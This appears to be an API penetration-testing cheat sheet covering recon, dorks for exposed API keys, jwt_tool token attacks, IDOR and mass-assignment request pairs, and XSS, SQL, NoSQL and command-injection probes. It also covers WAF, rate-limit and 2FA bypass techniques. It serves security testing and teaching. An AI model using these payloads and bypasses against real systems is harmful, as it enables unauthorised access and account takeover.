- Arjun / Hunt by jhaddix
- Amass
- Kiterunner
- FFUF
- Param Miner
- crAPPI
- Juice Shop
- VAmPI
- DVWS-node
- DamnVulnerable MicroServices
- Node-API-goat
- Vulnerable GraphQL API
- Generic-University
- vulnapi
- JWT Knowledge
- IDOR
- Access Control Issues
- SQLi
- NoSQLI
- More Will Be Great
- Subdomain Enumration To API Discovery
cat subs.txt | grep "api"- Wayback Data To API dicovery
cat subs.txt | httpx | cut -f "/" -d 3 | waybackurls | anew urls.txt
cat subs.txt | httpx | cut -f "/" -d 3 | gau | anew urls.txt
cat subs.txt | httpx | hakrawler | anew urls.txt
cat urls.txt | httpx -debug | grep -e "content-type: application/json" -e "content-type: application/xml" -e "json" - Google Dorking
inurl:"/wp-json/wp/v2/users"
# Finds all publicly available WordPress API user directories
intitle:"index.of" intext:"api.txt"
# Finds publicly available API key files
inurl:"/includes/api/" intext:"index of /"
# Finds potentially interesting API directories
ext:php inurl:"api.php?action="
# Finds all sites with a XenAPI SQL injection vulnerability OLD..
intitle:"index of" api_key OR "api key" OR apiKey -pool
# Lists potentially exposed API keys- Shodan To APi Discovery
hostname:"targetname.com" "content-type: application/json"
hostname:"targetname.com" "content-type: application/xml"
hostname:"targetname.com" "wp-json"
eg : "example.com" "content-type: application/json"- Bruteforce target to api discovery
# Wordlist : API_superlist
ffuf -u https://FUZZ.example.com -w API_superlist.txt
# Wordlist /api/wordlists/common_apis_160
ffuf -u https://example.com/FUZZ -w common_apis_160- Manual Github Recon
- Search For API Key, Endpoints , Datasets
- Check Commits , Pull Requests
- Recon about api from Grep.App
- Recon about api from GitRob
- Recon about api from ProgrammableWeb
- Recon about api from RapidApi
- Recon about api from Apis Guru
- Javascript Enumration
- scan for API running on different port number
- Shodan
- naabu
- Hidden api paths in robots.txt file
- Check API urls from URLscan io
- Discovering API Content with Kiterunner
kr scan http://192.168.195.132:8090 -w ~/api/wordlists/data/kiterunner/routes-large.kite
# use .txt file with kr
kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt- Try To Find API documentation
- Create account and check
- Check if any subdomain starts with docs.example.com
- Bruteforce
- If documentation is private (Wayback Machine, URLscan.io)
- Javascript Endpoint Alalysis
RedJs : A tool created by me . Under devlopment but best so far
# Save All Js File into 1 folder
redjs -u https://example.com -v -o scripts
redjs -t scripts | grep "Found"- Standard Notation in docs
Convention:
: or {}
Meaning:
The colon or curly brackets are used by
some APIs to indicate a path variable.
In other words, “:id” represents the variable for an ID number and “{username}”
represents the account username you are
trying to access.
Example:
/user/:id
/user/{id}
/user/2727
/account/:username
/account/{username}
/account/scuttleph1sh
Convention:
[]
Meaning:
Square brackets indicate that the input is
optional.
Example:
/api/v1/user?find=[name]
Convention:
||
Meaning:
Double bars represent different possible
values that can be used.
Example:
“blue” || “green” || “red”
Convention:
< >
Meaning:
Angle brackets represent a DomString,
which is a 16-bit string.
Example:
<find-function>
• What sorts of actions can I take? • Can I interact with other user accounts? • What kinds of resources are available? • When I create a new resource, how is that resource identified? • Can I upload a file? Can I edit a file?
-
Try To Perform Privileged Actions
-
Find Information Disclosures
- Unusual Header
- Unusual Parameter In Response
- Disclosed Email, Number , Etc. Try IDOR
- Create 2 accounts try accessing user 1's detail with user 2's JWT.
- Finding Security Misconfigurations
- Verbose Errors : Email Not Found To Email Enumration , Username incorrect, Software version to CVE search / setup locally and test there
- Debug Mode Enabled : Plenty of wordlists out there to test these
- Finding Excessive Data Exposures
- Brute Force Authentication
- Bruteforce Password Accoring To Target Policy
- BruteForce OTP / 2FA codes
- Bypass IP Ban With Load Balancer Headers Like X-Forwarded-For, etc
- Bypass Rate Limiting Via Tampering WIth Signature Headers and using multiple Generated Token
- Combine ALL Together if nessesary
- Forging Tokens
- Create multiple accounts
- Save Access Token into a text file
- Analyze Using Burp Sequencer > Manual Load > Analyze Now
- Also Character Level Analysis
- Burp Live Capture To Analyze Token Predicablilty
- Use Intruder To Bruteforce
- Use Burp JWT Extensions
- Use jwt_tool
jwt_tool <jwt>
jwt_tool eyghbocibiJIUZZINIISIRSCCI6IkpXUCJ9.eyIzdW1101IxMjMENTY3ODkwIiwibmFtZSI6ImhBuEkg
SGFja2VyIiwiaWFQIjoxNTE2MjM5MDIyfQ.IX-Iz_e1CrPrkel FjArExaZpp3Y2tfawJUFQaNdftFw- Attack JWT Using JWT_tool
jwt_tool -t http://target-site.com/ -rc "Header: JWT_Token" -M pb- Check Out Attackcking JWT Manual FOr
- None Algorithm attack
# Burp Extension and
jwt_tool <JWT_Token> -X a- Algorithm attack
# Check JWT attacks manual
- Find Company Public Key Used For RS256
- COnvert if it's in a json format to .pem and save it
# jwt_tool eyJBeXAiOiJKV1QiLCJhbGciOiJSUZI1Ni 19.eyJpc3MiOi JodHRwOlwvxC9kZW1vLnNqb2VyZGxhbm
drzwiwZXIubmxcLyIsIm1hdCI6MTYYCJkYXRhIjp7ImhlbGxvijoid29ybGQifx0.MBZKIRF_MvG799nTKOMgdxva
_S-dqsVCPPTR9N9L6q2_10152pHq2YTRafwACdgyhR1A2Wq7wEf4210929BTWsVk19_XkfyDh_Tizeszny_
GGsVzdb103NCITUEjFRXURJ0-MEETROOC-TWB8n6wOTOjWA6SLCEYANSKWaJX5XvBt6HtnxjogunkVz2sVp3
VFPevfLUGGLADKYBphfumd7jkh80ca2lvs8TagkQyCnXq5VhdZsoxkETHwe_n7POBISAZYSMayihlweg -x k-pk
public-key-pem- Weak Signature Crack Attack
jwt_tool <JWT Token> -C -d /wordlist.txt- input could include symbols, numbers, emojis, decimals, hexadecimal, system commands,SQL input, and NoSQL input, for instance.
- SQL Detection Payloads, Time Based Too
- No SQL Detection Payload
- A value in the quadrillions
- String of letters instead of numbers
- A large decimal number or a negative number
- Null values like null, (null), %00, and 0x00
- Symbols like the following: !@#$%^&*();':''|,./?>
- Sending characters from unexpected languages (漢, さ, Ж, Ѫ, Ѭ, Ѧ, Ѩ, Ѯ)
# wordlists
# big-list-of-naughty-strings.txt : From SecLists
# https://github.com/fuzzdb-project/fuzzdb
# https://github.com/xmendez/wfuzz- Quick Test
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
9999999999999999999999999999999999999999
~'!@#$%^&*()-_+
{}[]|\:''; '<>?,./
%00
0x00
$ne
%24ne
$gt
%24gt
|whoami
-- -
' ''
' OR 1=1-- -
'' ''''''
漢, さ, Ж, Ѫ, Ѭ, Ѧ, Ѩ, Ѯ
😀 😃 😄 😁 �
..
..\
../
\..\
\..\.\- Testing IDORS And Access Controls
Type Valid request BOLA test
Predictable ID GET /api/v1/account/ 2222 GET /api/v1/account/ 3333
Token: UserA_token Token: UserA_token
ID combo GET /api/v1/UserA/data/2222 GET /api/v1/ UserB /data/ 3333
Token: UserA_token Token: UserA_token
Integer as ID POST /api/v1/account/ POST /api/v1/account/
Token: UserA_token Token: UserA_token
{"Account": 2222 } {"Account": [3333]}
Email as POST /api/v1/user/account POST /api/v1/user/account
user ID Token: UserA_token Token: UserA_token
{"email": " [email protected]"} {"email": " [email protected]"}
Group ID GET /api/v1/group/ CompanyA GET /api/v1/group/ CompanyB
Token: UserA_token Token: UserA_token
Group and POST /api/v1/group/ CompanyA POST /api/v1/group/ CompanyB
user combo Token: UserA_token Token: UserA_token
{"email": " [email protected]"} {"email": " [email protected]"}
Nested object POST /api/v1/user/checking POST /api/v1/user/checking
Token: UserA_token Token: UserA_token
{"Account": 2222 } {"Account": {"Account" :3333}}
Multiple POST /api/v1/user/checking POST /api/v1/user/checking
objects Token: UserA_token Token: UserA_token
{"Account": 2222 } {"Account": 2222, "Account":3333, "Account": 5555 }
Predictable POST /api/v1/user/account POST /api/v1/user/account
token Token: UserA_token Token: UserA_token
{"data": "DflK1df7jSdfa1acaa"} {"data": "DflK1df7jSdfa2dfaa"}
- A-B Method
- Tools : Burp Authorize Burp Autprepeater
- List senstive endpoints
- Create 2 Accounts
- Save Cookie/Token and IDs
- Request to all senstive enspoints with altering in bwtween IDs and Tokens as Displayed Above
- Side-Channel BOLA
- Can be used to chain attacks
Request Response
GET /api/user/test987123 404 Not Found HTTP/1.1
GET /api/user/hapihacker 405 Unauthorized HTTP/1.1
GET /api/user/1337 405 Unauthorized HTTP/1.1
GET /api/user/phone/2018675309 405 Unauthorized HTTP/1.1- BFLA involves searching for functionality to which you should not have access.
- Try Each Methods Like : GET, POST,UPDATE,PUT,DELETE
- A-B-A Testing for BFLA
- Create, read, update, or delete resources as UserA
- Swap out your UserA token for UserB’s
- Send GET, PUT, POST, and DELETE requests for UserA’s resources using UserB’s token.
- Check UserA’s resources to validate changes have been made by using UserB’s token
- Use Burp SUite Match And Replace Option
- It's a method to add unknown json variables in earch request. eg t. Account registration, profile editing, user management, and client management are all common functions that allow clients to submit input using the API.
- Use Burp Param Miner Extention -> Guess Json Data
- Arjun
- Documentation
- HUNT
- EG :
# This
POST /api/v1/register
--snip--
{
"username":"hAPI_hacker",
"email":"[email protected]",
"pass
# To This
POST /api/v1/register
--snip--
{
"username":"hAPI_hacker",
"email":"[email protected]",
"admin": true,
"password":"Password1!"- While API sends Forgot Password Link To Email. Use Phone Number Instead To Create An Exception
- Change GroupA as GroupB to access GroupB resources
- Get Json data from Arjun And use it
POST /api/v1/register
--snip--
{
"username":"hAPI_hacker",
"email":"[email protected]",
"admin": true,
"admin":1,
"isadmin": true,
"role":"admin",
"role":"administrator",
"user_priv": "admin",
"password":"Password1!"
}- Automating Mass Assignment Attacks with Arjun and Burp Suite Intruder
arjun --headers "Content-Type: application/json]" -u http://vulnhost.com/api/register -m JSON --include='{$arjun$}'- Found BFLA
- Attack BFLA With Mass Assignment To increase impact
- eg
# From
PUT /api/v1/account/update
Token:UserA-Token
--snip--
{
"username": "Ash",
"address": "123 C St",
"city": "Pallet Town"
"region": "Kanto",
}
# To
PUT /api/v1/account/update
Token:UserA-Token
--snip--
{
"username": "Brock",
"address": "456 Onyx Dr",
"city": "Pewter Town",
"region": "Kanto",
"email": "[email protected]",
"mfa": false
}- Before you can inject a payload using an API, you must discover places where the API accepts user input
- API keys
- Tokens
- Headers
- Query strings in the URL
- Parameters in POST/PUT requests
- Injection Payloads
- Data That Is Displayed In Web Page Try XSS : Username / Email / Addresss / Anything You COntrol
<script>alert("xss")</script>
<script>alert(1);</script>
<%00script>alert(1)</%00script>
SCRIPT>alert("XSS");///SCRIPT>- Any Request That Makes / Changes Data To Be Persistence
- SQL Injection
# Detection Payload
'
''
;%00
--
-- -
""
;
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
OR 1=1- NoSql Injection
# Detection
$gt
{"$gt":""}
{"$gt":-1}
$ne
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
{"$nin":[1]}
|| '1'=='1
//
||'a'\\'a
'||'1'=='1';//
'/{}:
'"\;{}
'"\/$[].>
{"$where": "sleep(1000)"}- Command Injection # wordlists/os-cmds.txt
- Evading Security & WAF
- Detect WAF
waf00f https://api.target.com- Evading Payload To Bypass WAF : Try All These To Determine The Perticular Bypass Method WHihc is accepted by backend
- Parameter Polluton
- URL Encoding
- Base 64 & HTml endoing
- String Terminators
# add as prefix or suffix
%00
0x00
//
;
%
!
?
[]
%5B%5D
%09
%0a
%0b
%0c
%0e- Rate Limit Bypass
- Configure Ip rotate
- Use ProxyChains
- Check For These Headers In Req & Res
x-rate-limit:
x-rate-limit-remaining:- Path Bypass
POST /api/myprofile
--snip--
{uid=§0001§}
POST /api/myprofile%00
POST /api/myprofile%20
POST /api/myProfile
POST /api/MyProfile
POST /api/my-profile- Origin Header Spoofing
X-Forwarded-For
X-Forwarded-Host
X-Host
X-Originating-IP
X-Remote-IP
X-Client-IP
X-Remote-Addr-- Pending